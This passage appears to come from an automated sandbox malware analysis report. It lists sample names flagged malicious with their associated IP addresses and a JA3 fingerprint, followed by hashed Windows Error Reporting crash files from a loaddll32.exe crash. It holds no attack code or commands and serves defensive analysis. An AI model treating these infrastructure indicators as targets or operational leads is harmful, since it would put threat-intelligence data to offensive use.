                        00:44:15 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
                        00:45:46 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                        00:46:11 | API Interceptor | 7x Sleep call for process: svchost.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        Match: AS-CHOOPAUS
                        Associated Sample Name / URL | Detection | Context
                        ImSL42AOtZ.exe | malicious | 45.63.36.79
                        spZRMihlrkFGqYq1f.dll | malicious | 66.42.57.149
                        spZRMihlrkFGqYq1f.dll | malicious | 66.42.57.149
                        iU17wh2uUd.exe | malicious | 149.28.253.196
                        iU17wh2uUd.exe | malicious | 149.28.253.196
                        Sz4lxTmH7r.exe | malicious | 149.28.253.196
                        7AF33E5528AB8A8F45EE7B8C4DD24B4014FEAA6E1D310.exe | malicious | 149.28.253.196
                        RFIlSRQKzj.exe | malicious | 45.32.115.235
                        setup_x86_x64_install.exe | malicious | 149.28.253.196
                        991D4DC612FF80AB2506510DBA31531DB995FE3F64318.exe | malicious | 149.28.253.196
                        MMUc2aeWxZ.exe | malicious | 149.28.253.196
                        0pvsj0MF1D.exe | malicious | 149.28.253.196
                        Linux_amd64 | malicious | 45.32.162.141
                        nkXzJnW7AH.exe | malicious | 149.28.253.196
                        67MPsax8fd.exe | malicious | 136.244.117.138
                        Linux_x86 | malicious | 45.77.44.252
                        uI6mJo4TJQ.exe | malicious | 149.28.253.196
                        uI6mJo4TJQ.exe | malicious | 149.28.253.196
                        M2jG6lMe7Y.exe | malicious | 202.182.120.6
                        7LPqKhiPCL.exe | malicious | 139.180.133.9

                        JA3 Fingerprints

                        Match: 51c64c77e60f3980eea90869b68c58a8
                        Associated Sample Name / URL | Detection | Context
                        TYLNb8VvnmYA.dll | malicious | 45.63.5.129
                        2gyA5uNl6VPQUA.dll | malicious | 45.63.5.129
                        spZRMihlrkFGqYq1f.dll | malicious | 45.63.5.129
                        spZRMihlrkFGqYq1f.dll | malicious | 45.63.5.129
                        fehiVK2JSx.dll | malicious | 45.63.5.129
                        kQ9HU0gKVH.exe | malicious | 45.63.5.129
                        gvtdsqavfej.dll | malicious | 45.63.5.129
                        mhOX6jll6x.dll | malicious | 45.63.5.129
                        dguQYT8p8j.dll | malicious | 45.63.5.129
                        jSxIzXfwc7.dll | malicious | 45.63.5.129
                        mhOX6jll6x.dll | malicious | 45.63.5.129
                        X2XCewI2Yy.dll | malicious | 45.63.5.129
                        dguQYT8p8j.dll | malicious | 45.63.5.129
                        date1%3fBNLv65=pAAS.dll | malicious | 45.63.5.129
                        HMvjzUYq2h.dll | malicious | 45.63.5.129
                        s9BZBDWmi4.dll | malicious | 45.63.5.129
                        bFx5bZRC6P.dll | malicious | 45.63.5.129
                        c7IUEh66u6.dll | malicious | 45.63.5.129
                        HMvjzUYq2h.dll | malicious | 45.63.5.129
                        s9BZBDWmi4.dll | malicious | 45.63.5.129

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_8c5962cbbdb13a8671f1f3c3793157e73bd5d897_d70d8aa6_09efe6a1\Report.wer
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category: dropped
                        Size (bytes): 65536
                        Entropy (8bit): 0.6754551774972452
                        Encrypted: false
                        SSDEEP: 96:P7/jKZqyHy9hkoyt7JfapXIQcQ5c6A2cE2cw33+a+z+HbHgIVG4rmMOyWZAXGng/:TLoB2HnM28jj8q/u7siS274ItW
                        MD5: 519B12A445EE049708691A6E7B16C4CA
                        SHA1: 32D3A6E3661935CF9AEAFC9935DAC440FA484D4C
                        SHA-256: 6276E8D1AEC9B8964A389F6231360F7450B4B4AEC72C8B28669E03DEE8C93A80
                        SHA-512: C9590F7441E08FCBA300D11638AED1A292523B9D6C8C1AE23493AE97FE056DD3DFA181239057BF09453973D1D3630373D51F35A69A0534B4E149FDDB7EDAB600
                        Malicious: false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.3.3.0.3.4.0.7.8.0.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.1.a.d.d.f.c.5.-.9.a.a.7.-.4.9.9.6.-.8.7.4.4.-.5.7.8.c.4.d.6.5.6.4.1.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.9.4.6.9.6.8.-.d.a.d.b.-.4.d.6.8.-.9.5.a.e.-.f.7.9.6.0.5.f.3.2.3.1.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.4.-.0.0.0.1.-.0.0.1.c.-.3.2.1.2.-.1.1.a.3.5.8.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.9././.2.8.:.1.1.:.5.3.:.0.5.!.0.!.l.o.a.d.d.l.l.3.2...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.
                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_d71d33d652a62c864cb684e881f783bcee8c2df7_d70d8aa6_17200f86\Report.wer
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category: modified
                        Size (bytes): 65536
                        Entropy (8bit): 0.6786083513367968
                        Encrypted: false
                        SSDEEP: 96:y6FFJjKZqycy9hk1Dg3fWpXIQcQec6kxcEicw3DH+a+z+HbHgIVG4rmMOyWZAXGA:xF3oB0HQ4xoXj8q/u7siS274ItW
                        MD5: CCD4E670F6E0FD8F16CEA2A17AE5D3B6
                        SHA1: 0FA826EAD3722AFBBA9C30D364A36C6D7962E95F
                        SHA-256: F47E9FFC535B549A1F0B11E7EC861A733F99D950299EE6A73B00A722FF623387
                        SHA-512: 7E9789D95CC820652B262FA01FFE14DFA25E8A55E956F1299BC1C83ED99CE9FD50255D7BE4B011D71B7677C11B6E5DAC15DF6E62B9988E7857F119CD181A7A4F
                        Malicious: false
                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.9.0.8.3.4.0.3.6.5.6.8.2.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.9.0.8.3.4.5.1.6.2.5.4.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.6.d.0.6.5.0.-.b.d.0.5.-.4.1.9.2.-.9.e.1.0.-.3.2.1.7.9.a.7.b.8.6.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.d.9.b.6.c.0.-.b.0.d.6.-.4.7.a.9.-.8.0.e.2.-.a.c.b.9.f.3.d.9.2.4.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.0.4.-.0.0.0.1.-.0.0.1.c.-.3.2.1.2.-.1.1.a.3.5.8.e.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER20B.tmp.xml
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: XML 1.0 document, ASCII text, with CRLF line terminators
                        Category: dropped
                        Size (bytes): 4558
                        Entropy (8bit): 4.4286066367901995
                        Encrypted: false
                        SSDEEP: 48:cvIwSD8zspJgtWI9PfWSC8B4a8fm8M4J2yGtFgV+q84tj9tKcQIcQwQud:uITf7QOSNuJEWx9tKkwQud
                        MD5: 36DC4E2BDC01D672F8486704401DF7C3
                        SHA1: AF97460BC10F8446A011F7F0F9C6F2B12C8540C0
                        SHA-256: 9C05BE63346A1C2FA16AC8F9DE7CC6398F05CC44F153FF6D57C844D56A4A0B7F
                        SHA-512: 8DCFF5650ECE5641F52761CDA51CF83BBD14EA15F80F15E5D02D0E31B6887E57BB0858C10B99AA7BE3A49CB7A07FBEA37B5B91A3F9820C613AA79AAEA2B185A6
                        Malicious: false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2267.tmp.csv
                        Process: C:\Windows\System32\svchost.exe
                        File Type: data
                        Category: dropped
                        Size (bytes): 51112
                        Entropy (8bit): 3.0656805850873763
                        Encrypted: false
                        SSDEEP: 1536:Q7H6JWZtd0Mtf2loP4kSLpN7Fe+UHq9oq:Q7H6JWZtd0Mtf2loP4kSLz7Fe+UHq9oq
                        MD5: E91A2899D6B45701430454485E57F9AD
                        SHA1: 25B8A43DD9F2C0D30B6E0892DB7693ABFFF52DC5
                        SHA-256: BB511E8DFAC2A05923CC2215B0A42DAB18852307FBFC808A69521D88F526DD4B
                        SHA-512: D3C8BD472241D8E7CF869F72DF2DBE71EB31D2718AC023B6A52E8389904F8817B31E2AB47034E9BF220D9073F2FDB31EF5E20F6AADD0E5C4CDF628729BF2EF32
                        Malicious: false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER2650.tmp.txt
                        Process: C:\Windows\System32\svchost.exe
                        File Type: data
                        Category: dropped
                        Size (bytes): 13340
                        Entropy (8bit): 2.6957637466701168
                        Encrypted: false
                        SSDEEP: 96:9GiZYWnClduRYoYxWfA2HCUYEZGCtCiDvOoxkWwtw2IaQihdMobIiY3:9jZDnb/QHCPaQihdMoUiY3
                        MD5: BB5A0508F1DC906444E12D7FF7C0B47C
                        SHA1: A8180F31565DED2FAAB9D05F8CD2E6D4E3A4A365
                        SHA-256: 1675E0F2B4EE5B40E2EBE5996A7D72A2414A5E942B0CE4D9EE1809C27782617E
                        SHA-512: E16E490851A32B342FB3B3BD112E4C5C445590FE1F641F4B9A094AC218A299A3299BD75F6CB56E6DB95C2AD69F7A28318093147460CBD168A7FA862FC63E1D48
                        Malicious: false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER442A.tmp.csv
                        Process: C:\Windows\System32\svchost.exe
                        File Type: data
                        Category: dropped
                        Size (bytes): 50736
                        Entropy (8bit): 3.067413848116051
                        Encrypted: false
                        SSDEEP: 768:mlHP0PBtEtb8nvcbqq0Mpf2jsIj6fL5a8JFQlRrX6pBB:mlHP0kmvnq0Mpf2jsIj6fVfJFQlRrXg
                        MD5: 803E6C65E05E444CC6D1234CF13CF698
                        SHA1: 201646938AD21499C4446FD4159ACEB037755D36
                        SHA-256: 0341B3AFAB60971EFE6B68E35AF935FBAD56E6839CCE467968A460E614D030EC
                        SHA-512: B7BE0875BF25E891CAE62FB082D0C3C37FC68A35423E1AB05F19E42F4D0B1A0CCF95A089A47678614F293525CE4174555DA93DC6127EABCABC5E790C61DEB3D5
                        Malicious: false
                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER47E4.tmp.txt
                        Process: C:\Windows\System32\svchost.exe
                        File Type: data
                        Category: dropped
                        Size (bytes): 13340
                        Entropy (8bit): 2.6958812411265396
                        Encrypted: false
                        SSDEEP: 96:9GiZYWocWRksgYjYdWG0HdUYEZWdtBiMOikPwBxOaOiulooVI2D3:9jZDoctEjtIaOiulooq2D3
                        MD5: BCC0FBB5EA3D4F459A785BF7D40D04CF
                        SHA1: 0AEDC449D95C2419CCD888AD1DA3693A7139C327
                        SHA-256: 7C03C8D4FD2D8B2A001292421BDF8921526A7ABD2C0A5E271F4B1D2E84F0AB60
                        SHA-512: 7365B1E98BF06F0AEA990ACCD4AD84518A6CFC42DB908FE346CD5FC7C250A1558B0979C47CA47F05CED96CDA52E0B366D68BACB70A1472B49E1340F315E7B398
                        Malicious: false
                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERCFCE.tmp.dmp
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: Mini DuMP crash report, 15 streams, Thu Dec 2 08:45:33 2021, 0x1205a4 type
                        Category: dropped
                        Size (bytes): 27124
                        Entropy (8bit): 2.5227497585999266
                        Encrypted: false
                        SSDEEP: 192:vn98xfZSOGRoR6ETXD19JBFdL66e5zB9/jm2Qc7NO:OZZtvR3bkhB9/jm2I
                        MD5: E5141806E722AB8D685803190E529910
                        SHA1: E7375311A45E87F4545F3A1FED9321BA37A5667C
                        SHA-256: CE0B8E9F3A2E2F8E894245630FD8FD6971ACD011578E02B7DE25AE66A2568595
                        SHA-512: 32113A36B37B843C9D791E873C6675725DD94371F8F2B3A45A6EC04083C75E0B010BB67AA259C9AEDEABACF498B29BF5B517683B97DCFE7FE7E9C125DDB32F96
                        Malicious: false
                        Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........h....]...........................................................................................U...........B......p.......GenuineIntelW...........T..............a*............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERDDA9.tmp.WERInternalMetadata.xml
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category: dropped
                        Size (bytes): 8342
                        Entropy (8bit): 3.6988259840759303
                        Encrypted: false
                        SSDEEP: 192:Rrl7r3GLNi4D26D6YFwSUVegmfsSz1CpBD89b8isfnNUm:RrlsNi96D6YySUVegmfsSzL8hf7
                        MD5: 42DAD3491F32B2156FE774868DCBB554
                        SHA1: 0C2893932753C19EEBAE582C44714506F1BD2D6F
                        SHA-256: DCB65F16F4D0337855B5F95382D6AB207DB90474BE09EEAD95F10951A9BD9E37
                        SHA-512: 9929CB1E5BB76D9BCB6F963151702123B401815774C66EFD9F381C2846B73C75405BE264B42E6C9314D5B79C8FB8DE5793CD6835270484E2C9DA6B7B592CAD27
                        Malicious: false
                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.0.4.<./.P.i.d.>.......
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERE06A.tmp.xml
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: XML 1.0 document, ASCII text, with CRLF line terminators
                        Category: dropped
                        Size (bytes): 4598
                        Entropy (8bit): 4.472927288004771
                        Encrypted: false
                        SSDEEP: 48:cvIwSD8zspJgtWI9PfWSC8B5/8fm8M4J2yzZFz+q84WvRtKcQIcQwQud:uITf7QOSNTkJJXgRtKkwQud
                        MD5: 26B590A331A6F8FD1749A5322B474168
                        SHA1: 1DE890E6BD761F52BF77BCCF60C4ACCD5E57ECAD
                        SHA-256: 6C3DACC0416F1B7F815490F2722B56017C93613967CE07E56371FF35329907B0
                        SHA-512: 16685B796C45267A7871E7582681EA078EF278236970923E153CADA1A972AAF1B7D346D4752D3E4A8420A33E389520F5637FFBE45F8360D1F804F32F57CD60A3
                        Malicious: false
                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1279796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6ED.tmp.dmp
                        Process: C:\Windows\SysWOW64\WerFault.exe
                        File Type: Mini DuMP crash report, 15 streams, Thu Dec 2 08:45:40 2021, 0x1205a4 type
                        Category: dropped
                        Size (bytes): 1060200
                        Entropy (8bit): 1.459332588866509
                        Encrypted: false
                        SSDEEP: 6144:gD0HYoO64LlrQxLx6OkjgUL+XOOk1PUG+7:gD0HYoO6q2G0
                        MD5: B6BCA9CF0542358C956D652400C7FF18
                        SHA1: 5EFB1A9C3D6F8CA85FCE38945B9C352537BF5DCD
                        SHA-256: 01112605F92FD92E2EB2C0507F67D12D15F3E6F48F1A7CD29EE469BBD91F1DD0
                        SHA-512: 9D4EB1932918C38BB75AD67AD12CDF6120E0271BD019B90AF21454509F03264C13BB836C5188844EADE81CBCC3B6A9C4E4705853768568812E9AE00F10AC5CFA
                        Malicious: false
                        Preview: MDMP....... ..........a............4...............H.......$...........................`.......8...........T...........@...(!...........................................................................................U...........B......p.......GenuineIntelW...........T..............a*............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF1C.tmp.WERInternalMetadata.xml
                        Process:C:\Windows\SysWOW64\WerFault.exe
                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):8302
                        Entropy (8bit):3.690427159648357
                        Encrypted:false
                        SSDEEP:192:Rrl7r3GLNi4DI666YF6SU1e6JgmfL8GSmSCpDI89b9isfJfm:RrlsNiD666Y4SU1lgmfLrSI9hfs
                        MD5:BF673072D4F11B6CB75E987CFAA38AD1
                        SHA1:AA483DC23D4CA3D73D92E79156DC7C5A28698ECC
                        SHA-256:FF96A29393157F771AD0D81CCB63C48CF89339901200BF7DAEA162D1B6DF87F2
                        SHA-512:9B8D70A980B50950540E453D8E6571058D7CB79301B9FD1D6AEC14005EB8D5D60624542745B3B728907078476FA3DA58CA9375D53F555CB92B960BFEB22EA3CE
                        Malicious:false
                        C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                        Process:C:\Windows\System32\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):65536
                        Entropy (8bit):0.11021535299334234
                        Encrypted:false
                        SSDEEP:12:266TXm/Ey6q9995I+o4q3qQ10nMCldimE8eawHjcDP:26fl68G+ULyMCldzE9BHjcL
